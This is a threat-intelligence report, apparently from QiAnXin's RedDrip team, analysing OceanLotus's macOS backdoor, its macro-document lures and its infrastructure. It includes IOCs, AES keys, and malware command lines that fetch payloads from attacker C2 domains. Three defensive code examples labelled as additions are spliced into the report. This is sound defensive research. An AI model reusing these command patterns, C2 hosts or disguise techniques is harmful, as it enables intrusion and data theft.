7df61bc3a146fcf56fe1bbd3c26ea8c0 | 2018-10-22 03:34:11 | 113664 | DllHijack.dll |
3c04352c5230b8cbaa12f262dc01d335 | 2018-11-14 07:07:53 | 92672 | DllHijack.dll |
41f717eda9bc37de6ea584597f60521f | 2018-11-15 02:03:44 | 92672 | DllHijack.dll |
db81a7e405822be63634001ec0503620 | 2018-11-28 08:55:24 | 112128 | DllHijack.dll |
865a7e3cd87b5bc5feec9d61313f2944 | 2018-11-29 02:21:27 | 92672 | DllHijack.dll |
aad445e7ffc5ce463996e5db13350c5b | 2018-11-29 08:18:42 | 115712 | DllHijack.dll |
9bcd0b2590c53e4c0ed5614b127c6ba7 | 2018-11-29 09:25:15 | 112128 | DllHijack.dll |
7338852de96796d7f733123f04dd1ae9 | 2018-12-04 02:27:26 | 92672 | DllHijack.dll |
906a6898d099eb50c570a4014c1760f5 | 2018-12-04 04:31:45 | 115712 | DllHijack.dll |
a530410bca453c93b65d0de465c428e4 | 2018-12-06 03:21:22 | 115712 | DllHijack.dll |
de409b2fe935ca61066908a92e80be29 | 2018-12-10 04:03:20 | 115712 | DllHijack.dll |
2756b2f6ba5bcf811c8baced5e98b79f | 2018-12-10 04:29:12 | 92672 | DllHijack.dll |
MAC Backdoor
In the previous chapter, we found that the C2 rio.imbandaad.com resolved to the IP 198.15.119.125. When we checked the IP again, we found that one of the domain names on it, web.dalalepredaa.com, had been labeled as OceanLotus.
Through this domain name, we discovered OceanLotus's newest Mac sample.
To disguise itself as a document, the sample first replaces the "d" in the docx extension of the folder name with the lowercase Roman numeral five hundred (ⅾ) to deceive users: Don khieu nai.ⅾocx
On Windows it looks like this:
On macOS it shows the Office icon of a docx file, but it is actually a directory:
This is because iconFile in info.plist points to the icon file of a doc, as shown below:
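Added example, not from the report: a Python check for the two masquerading tricks above, a document extension built from a confusable character (NFKC normalization turns `ⅾ` back into `d`) and a directory, such as an app bundle, that carries a document extension. The extension list is an assumption.

```python
import unicodedata

# Assumed set of extensions a lure would imitate; extend as needed.
DOCUMENT_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf"}


def split_extension(name: str) -> str:
    """Return the extension including the dot, or '' if there is none."""
    _, dot, ext = name.rpartition(".")
    return ("." + ext) if dot else ""


def confusable_extension(name: str):
    """If the extension only *looks* like a document extension, i.e. NFKC
    normalization turns it into one, return details; otherwise None."""
    ext = split_extension(name)
    if not ext:
        return None
    normalized = unicodedata.normalize("NFKC", ext).lower()
    if normalized not in DOCUMENT_EXTENSIONS or normalized == ext.lower():
        return None
    # Each character that normalization rewrote, with its Unicode name.
    confusables = [(c, unicodedata.name(c, "?"), unicodedata.normalize("NFKC", c))
                   for c in ext if unicodedata.normalize("NFKC", c) != c]
    return {"name": name, "ext": ext, "normalized_ext": normalized,
            "confusables": confusables}


def suspicious_entry(name: str, is_dir: bool):
    """Combine both tricks from the text: a confusable extension, or a
    directory (e.g. an .app bundle) whose name carries a document extension."""
    hit = confusable_extension(name)
    if hit:
        return "confusable extension: " + ", ".join(
            f"{c} ({n}) -> {r}" for c, n, r in hit["confusables"])
    if is_dir and unicodedata.normalize("NFKC", split_extension(name)).lower() in DOCUMENT_EXTENSIONS:
        return "directory named like a document (possible app bundle masquerade)"
    return None


if __name__ == "__main__":
    # Constructed entries: the lure name from the text, and a harmless file.
    for entry, is_dir in (("Don khieu nai.\u217eocx", True), ("Don khieu nai.docx", False)):
        print(repr(entry), "->", suspicious_entry(entry, is_dir))
```

Running the check over a download directory listing (`os.scandir` gives `is_dir()` for each entry) catches both variants before anyone double-clicks.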
The following is the signature information of the sample, as shown in the figure:
After the sample is executed, three directories will be created in the Library directory:
LaunchAgents
Media
Video
It installs an application under LaunchAgents to start at login:
The application points to the mediaagentd program in the Video directory:
At the same time, the original directory is replaced by a real docx file as a diversion:
The released mediaagentd program is packed; after decryption it is loaded and executed in memory:
The unpacked macOS file is as follows:
At the file's entry point there is a while loop that collects computer information and sends it, enters the remote-control loop function, sleeps for a random period of time, and repeats the process:
Many of the internal strings are encrypted. The following shows where the encryption function is used:
The decryption is done mainly through CCCrypt; the algorithm is AES with an IV of 0, as shown in the figure:
AES encryption key (hex): 4e620abedafb4d9866cc9d9c2d29e2d7ea18adf1, padded with zeros to a length of 32:
The decrypted data is as follows:
The collected information is encrypted with AES and sent through the CURL library:
The remote-control message dispatch function is as follows: different operations are performed according to the token at the start of the message. The following is the directory listing operation:
The key used for data transmission differs from the key used to decrypt strings. The following is the encryption key for data transmission:
07e74ff2ce9688c8f79b91ab32c95d11c140d3ac
Some string decryption routines first base64-decode, then AES-decrypt:
However, the base64 used in the decryption is not standard base64. The following figure shows the base64 table of the malicious code:
The encrypted data is sent to the C2, as shown in the figure below:
C2: web.dalalepredaa.com
It is worth noting that some of the recent OceanLotus Mac samples were found to be signed. After deduplication, we found two commonly used signing identities:
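Added example for the non-standard base64 alphabet above (example code, not the malware's table or anything from the report): decoding by translating the custom alphabet onto the standard one, which lets the stock decoder do the rest. The sample alphabet here is constructed (the standard alphabet reversed); a real table would be recovered from the binary as the figure shows.

```python
import base64
import string

STANDARD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def decode_custom_base64(text: str, alphabet: str) -> bytes:
    """Decode base64 written with a non-standard 64-character alphabet by
    mapping it onto the standard alphabet first. '=' is assumed to remain the
    pad character and missing padding is tolerated."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64 or "=" in alphabet:
        raise ValueError("alphabet must be 64 distinct characters excluding '='")
    text = text.strip().rstrip("=")
    std = text.translate(str.maketrans(alphabet, STANDARD))
    std += "=" * (-len(std) % 4)          # restore padding
    return base64.b64decode(std, validate=True)


def encode_custom_base64(raw: bytes, alphabet: str) -> str:
    """Inverse mapping; used here only to build sample data."""
    std = base64.b64encode(raw).decode("ascii")
    return std.translate(str.maketrans(STANDARD, alphabet))


def standard_base64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


# Constructed alphabet for the demo: the standard table reversed.
SAMPLE_ALPHABET = STANDARD[::-1]

if __name__ == "__main__":
    msg = b"ls -la /Users/Shared/"     # constructed plaintext, 21 bytes so no padding
    enc = encode_custom_base64(msg, SAMPLE_ALPHABET)
    print("custom  :", enc)
    print("standard:", standard_base64(msg))
    print("decoded :", decode_custom_base64(enc, SAMPLE_ALPHABET))
```

Decoding the custom string with the standard alphabet produces garbage rather than an error, which is exactly why a static base64 check misses these strings; the AES layer described above is applied to the result.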
Melinda Cline (P74QRJXB2F)
DAVID DOWELL (B5YH6VDVRE)
Office Documents
Through correlation analysis, we found that the macro document samples share a common origin with a large number of other samples.
As can be seen from the comparison case below, the documents were created at the same time and by the same author.
The following figure shows the template feature; the template file name is very characteristic of OceanLotus.
After analysis, we summarized the author names commonly used in OceanLotus attack documents; the largest attack activities among them were the "DEV" activity and the "Tushar" activity.
After correlation analysis across various dimensions, the document names and hash values involved in this series of malicious macro file campaigns are as follows.
Document name | MD5 |
--- | --- |
Test.doc | 5c9ef8b5263651a08ea1b79057a5ee28 |
Scan_Mau_Ao_Thun.doc | b858c08cf7807e462ca335233bd83fe7 |
Content marketing Kaspersky.doc | c313f8a5fd8ca391fc85193bc879ab02 |
Doc.doc | 473fdfefa92725099ca87e992edbc92c |
LY_ANH_TRUNG_CV.doc | 02cec2f17a7910b6fa994f340bbbc297 |
LY ANH TRUNG CV.doc | dd5ae0c0a7e17d101f570812fec4e5e4 |
LY_ANH_TRUNG_CV.doc | 90e5ff68bf06cb930ed8c040139c4650 |
LY_ANH_TRUNG_CV.doc | 6db450c4c756071ecafff425d6183d7d |
CV-DucNguyenMinh.doc | cb39e2138af92c32e53c97c0aa590d48 |
CV, Nguyen Minh Duc.docx | 8e13895504e643cd8e0e87377b25bd6b |
Danh sach can bo vi pham.doc | d3c27f779d615a1d3a35dff5e9561eb0 |
Danh Sach Nhan Vien Bien Thu Tien Cong Ty.docx | 27425360d18feea54860420006ea9833 |
Danh Sach Nhan Vien Bien Thu Tien Cong Ty.docx | cf0142da12509f544a59093495c3a6dd |
CV-AnthonyWei-CustomerService.docx | b1df440e5dd64ffae9f7e792993f2f4c |
 | 878fa022bd5e5caf678fe8d728ce42ee |
 | f78be074f6bc67a712e751254df5f166 |
Ho Chi Minh.docx | e2aed850c18449a43886fc79b342132f |
DS-Card-ChienThang-TraVinh.docx | 74b456adf2ae708789fb2d34ecccb954 |
HopDong-XXX-TP-092018.docx | 72263750df84e24fe645206a51772c88 |
BBLV_ASC_DG_092018.docx | 3a574c28beca4f3c94d30e3cf3979f4c |
Indo.docx | ee836e0f7a40571523bf56dba59898f6 |
Danh sach cac nha đấu tranh bị bắt 2.9.doc | f6068b672a19ce14981df011a55081e4 |
1 | 00ac0d7337290b74bdd7f43ec4a67ddb |
After analyzing the bait names of these samples, each series has its own characteristics:
1. Names with political characteristics: a list of arrested activists.
2. Resume (CV) baits, which can be linked to an email analyzed by security researcher @vupt_bka as OceanLotus resume phishing:
https://twitter.com/vupt_bka/status/1083653486963638275
3. Some documents show a lure to enable macros that differs from the earlier lure interface.
In addition, historical samples differ technically from the latest samples. As shown below, some historical samples do not use template injection but execute macro code directly, and the code to be executed is visible in the document content, namely the OHN macro code mentioned in the sample analysis section.
Correlation analysis of the macro samples above shows that the earliest such attack was in 2017. Judging from the file name, the bait document uploaded from Vietnam was most likely a test sample:
SAMPLES 08_11__12_2017 (317).
c4d35f3263fef4a533e7403682a034c3
4. The Vietnamese document-protection bait series appears most frequently.
Compression Files
While analyzing the OceanLotus sample Thu moi 209.rar, we found that the sample's creation timestamp appeared to have been customized.
The sample was uploaded to VT on March 1, 2019, and the gap between that upload time and the timestamps inside the compressed package is too large.
Therefore, by correlating on this timestamp, we found multiple related OceanLotus samples.
| File name | MD5 |
| --- | --- |
| 60982849-c8e4-4039-8f59-dfb78d8bab0d | |
| 15f5adf1-8798-49bf-b666-4a6c3d90b69e | bcbc1bef20d2befdd290e31269e0174a |
| 4052d2e7-cd4c-4a42-8841-52f782bba411 | dfaa343552e8d470096a0a09a018930f |
| ffea6446-e47a-4b7a-b7ff-e461f9775177 | 9b1ce9df321ce88ade4ff3b0ada5d414 |
| 5d47e097-c3bc-401e-8c0f-e877280b368a | da14eece6191551a31d37d1e96681cd1 |
| Thu moi 2019.rar | 76289f02a0b31143d87d5e35839fb24a |
Therefore, it can be further confirmed that the OceanLotus group customizes the sample creation time and generates samples in batches for delivery.
Conclusion
This report covers a large number of attacks on Indochinese Peninsula countries and the resources used by the OceanLotus group, revealing its long history of attacks, extremely wide range of targets and highly creative technical means. In its attacks, the group constantly changes baits, payloads and AV evasion techniques, and even its domain name assets keep evolving, reflecting a very strong capability and a persistent will to attack.
While tracking OceanLotus attacks against China, we also extend our understanding of the TTPs of this notorious group. This process will never end.
IOCs
Domain names:
syn.servebbs.com
word.webhop.info
beta.officopedia.com
outlook.updateoffices.net
outlook.betamedias.com
outlook.officebetas.com
office.allsafebrowsing.com
open.betaoffice.net
cortanazone.com
b.cortanazone.com
cortanasyn.com
api.blogdns.com
dominikmagoffin.com
blog.artinhauvin.com
worker.baraeme.com
kingsoftcdn.com
style.fontstaticloader.com
plan.evillese.com
bluesky2018man.com
enum.arkoorr.com
background.ristians.com
pong.dynathome.net
zone.servehttp.com
cdn.eworldship-news.com
online.stienollmache.xyz
image.fontstaticloader.com
mappingpotentials.com
vnbizcom.com
cdn3.onlinesurveygorilla.com
eworldship-news.com
enormousamuses.com
163mailservice.com
stackbio.com
mailserviceactivation.com
web.dalalepredaa.com
rio.imbandaad.com
p12.alerentice.com
Bait files:
fd128b9f0cbdc374227cf5564371aacc
4a0144c7436e3ff67cf2d935d82d1743
4c30e792218d5526f6499d235448bdd9
d8a5a375da7798be781cf3ea689ae7ab
2d3fb8d5b4cefc9660d98e0ad46ff91a
89e3f31c6261f4725b891c8fd29049c9
7b0e819bd8304773c3648ab03c9f182a
c4d35f3263fef4a533e7403682a034c3
b1df440e5dd64ffae9f7e792993f2f4c
a76be0181705809898d5d7d9aed86ee8
2785311085b6ca782b476d9c2530259c
60501717f81eacd54facecf3ebadc306
3d7cd531d17799832e262eb7995abde6
c7931fa4c144c1c4dc19ad4c41c1e17f
Correlated files:
5c9ef8b5263651a08ea1b79057a5ee28
b858c08cf7807e462ca335233bd83fe7
c313f8a5fd8ca391fc85193bc879ab02
473fdfefa92725099ca87e992edbc92c
02cec2f17a7910b6fa994f340bbbc297
dd5ae0c0a7e17d101f570812fec4e5e4
90e5ff68bf06cb930ed8c040139c4650
6db450c4c756071ecafff425d6183d7d
cb39e2138af92c32e53c97c0aa590d48
8e13895504e643cd8e0e87377b25bd6b
d3c27f779d615a1d3a35dff5e9561eb0
27425360d18feea54860420006ea9833
cf0142da12509f544a59093495c3a6dd
b1df440e5dd64ffae9f7e792993f2f4c
878fa022bd5e5caf678fe8d728ce42ee
f78be074f6bc67a712e751254df5f166
e2aed850c18449a43886fc79b342132f
74b456adf2ae708789fb2d34ecccb954
72263750df84e24fe645206a51772c88
3a574c28beca4f3c94d30e3cf3979f4c
ee836e0f7a40571523bf56dba59898f6
f6068b672a19ce14981df011a55081e4
00ac0d7337290b74bdd7f43ec4a67ddb
Correlated PE files:
2f9af6b9d73218c578653d6d9bd02d4d
c9d29501410e19938cd8e01630dc677b
URL:
http[:]//download-attachments.s3.amazonaws.com/db08b565038ac83e89e7b55201479f37ea49e525/f0c6ea8e-d2f8-445f-b649-57808b2015b7
Sample characteristics (PDB paths and command lines):
ZA:\Code\Macro_NB2\Request\PostData32.exe -u https://word.webhop.info/blak32.gif -t 200000
ZA:\Code\Macro_NB2\Request\PostData32.exe -u https://syn.servebbs.com/kuss32.gif -t 200000
UA:\Code\Nb2VBS\Request\PostData32.exe -u https://ristineho.com/threex32.png -t 60000
XA:\Code\Macro_NB2\Request\PostData32.exe -u https://cortanasyn.com/kirr32.png -t 200000
C:\Users\WIN7UTL64\Desktop\Macro_NB2_new\Request\PostData32.exe
C:\Users\WIN7UTL64\Desktop\Macro_NB2_new\Request\PostData32.exe -u https://office.allsafebrowsing.com/fdsw32.png -t 240000
SecurityAndMaintenance_Error.bin
d:\work\malware\vinacap\SecurityAndMaintenance_Error.png
d:\work\forensics\vinacap\dfir\nhule\files\SecurityAndMaintenance_Error.png
D:\work\forensics\vinacap\DFIR\Nhule\files\SecurityAndMaintenance_Error.png
Mac signing identities:
Melinda Cline (P74QRJXB2F)
DAVID DOWELL (B5YH6VDVRE)
AES keys:
String decryption: 4E620ABEDAFB4D9866CC9D9C2D29E2D7EA18ADF1
Encrypted packet: 07E74FF2CE9688C8F79B91AB32C95D11C140D3AC
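To make the domain indicators above actionable, a defender typically matches resolver or proxy logs against them, and the matching has to handle subdomains of a listed apex (b.cortanazone.com under cortanazone.com) without accepting look-alikes such as notcortanazone.com. The following added example is written for this report and is not RedDrip tooling; the domain subset is taken from the IOC list above, the DNS log lines and their format are constructed for the demonstration.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Subset of the domain indicators from the report's IOC list.
var iocDomains = []string{
	"web.dalalepredaa.com",
	"cortanazone.com",
	"cortanasyn.com",
	"office.allsafebrowsing.com",
}

// matchesIOC reports whether name equals an indicator or is a subdomain of
// one. Matching is on label boundaries, so "notcortanazone.com" does not hit.
func matchesIOC(name string) (string, bool) {
	name = strings.TrimSuffix(strings.ToLower(name), ".") // normalise case and trailing dot
	for _, d := range iocDomains {
		if name == d || strings.HasSuffix(name, "."+d) {
			return d, true
		}
	}
	return "", false
}

// sampleLog is CONSTRUCTED for this example: "<time> <client> query <type> <qname>".
const sampleLog = `2019-04-02T10:15:01Z 10.1.2.3 query A www.example.com
2019-04-02T10:15:07Z 10.1.2.3 query A web.dalalepredaa.com
2019-04-02T10:16:30Z 10.1.2.9 query A B.CORTANAZONE.COM.
2019-04-02T10:17:02Z 10.1.2.5 query A notcortanazone.com
`

// Hit records one log line that matched an indicator.
type Hit struct {
	Client string
	QName  string
	IOC    string
}

// scanLog walks the log line by line and returns every indicator match.
func scanLog(log string) []Hit {
	var hits []Hit
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) < 5 {
			continue // malformed line, skip
		}
		if ioc, ok := matchesIOC(f[4]); ok {
			hits = append(hits, Hit{Client: f[1], QName: f[4], IOC: ioc})
		}
	}
	return hits
}

func main() {
	for _, h := range scanLog(sampleLog) {
		fmt.Printf("%s queried %s (indicator: %s)\n", h.Client, h.QName, h.IOC)
	}
}
```

For production use, load the full list from a file and prefer an exact-match set plus a suffix check per label instead of the linear scan, but the boundary and normalisation rules shown here are the part that matters for avoiding both misses and false positives.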
References
[1] https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/
[2] https://twitter.com/blackorbird/status/1118399331688570880
[4] https://twitter.com/blackorbird/status/1086186184768815104
[5] https://twitter.com/RedDrip7/status/1119204830633848834
Appendix
RedDrip Team
RedDrip Team of QiAnXin (formerly SkyEye Team), founded in 2015, focuses on the research of APT attacks. As the first team to reveal the OceanLotus (APT-C-00) attacks, RedDrip Team is also a key part of the QiAnXin Threat Intelligence Center.
Our team includes security analysts and developers, covering the full cycle of threat intelligence operations: data sourcing, processing, analysis, and correlation. Our threat intelligence supports QiAnXin products and third-party products.
Relying on leading security data capacity and security expertise, we have discovered several noteworthy APT campaigns, including OceanLotus.